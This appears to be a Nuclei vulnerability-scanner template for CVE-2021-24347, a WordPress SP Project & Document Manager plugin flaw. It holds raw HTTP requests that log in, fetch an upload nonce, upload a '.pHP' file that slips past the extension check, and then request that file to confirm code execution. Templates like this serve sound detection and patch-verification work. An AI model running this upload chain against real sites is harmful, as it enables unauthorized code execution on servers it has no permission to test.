id: CVE-2021-24347 info: name: WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload author: theamanrawat severity: high description: | WordPress SP Project & Document Manager plugin before 4.22 is susceptible to authenticated shell upload. The plugin allows users to upload files; however, the plugin attempts to prevent PHP and other similar executable files from being uploaded via checking the file extension. PHP files can still be uploaded by changing the file extension's case, for example, from php to pHP. remediation: Fixed in version 4.22. reference: - https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a - https://wordpress.org/plugins/sp-client-document-manager/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24347 - http://packetstormsecurity.com/files/163434/WordPress-SP-Project-And-Document-Manager-4.21-Shell-Upload.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-24347 cwe-id: CWE-178 epss-score: 0.96951 epss-percentile: 0.99632 cpe: cpe:2.3:a:smartypantsplugins:sp_project_\&_document_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 4 vendor: smartypantsplugins product: sp_project_\&_document_manager framework: wordpress tags: sp-client-document-manager,wpscan,cve,wp-plugin,wp,authenticated,wordpress,cve2021,rce,packetstorm,intrusive http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy Content-Disposition: form-data; name="cdm_upload_file_field" {{nonce}} ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy Content-Disposition: form-data; name="_wp_http_referer" /wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy Content-Disposition: form-data; name="dlg-upload-name" ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy Content-Disposition: form-data; name="dlg-upload-file[]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy Content-Disposition: form-data; name="dlg-upload-file[]"; filename="{{randstr}}.pHP" Content-Type: image/svg+xml ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy Content-Disposition: form-data; name="dlg-upload-notes" ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy Content-Disposition: form-data; name="sp-cdm-community-upload" Upload ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy-- - | GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower("{{randstr}}.pHP")}} HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers-condition: and matchers: - type: dsl dsl: - contains(header_4, "text/html") - status_code_4 == 200 - contains(body_4, "CVE-2021-24347") condition: and extractors: - type: regex name: nonce group: 1 regex: - name="cdm_upload_file_field" value="([0-9a-zA-Z]+)" internal: true # digest: 4b0a00483046022100aeb42be5cb71ea4248292571c0fa9cebe281d513d74df191dac1195353f6bc31022100b28f529d9258ec7a9fa1cc23bd51b4bc89eff5a885b5c8b79abff98368b209c9:922c64590222798bb761d5b6d8e72950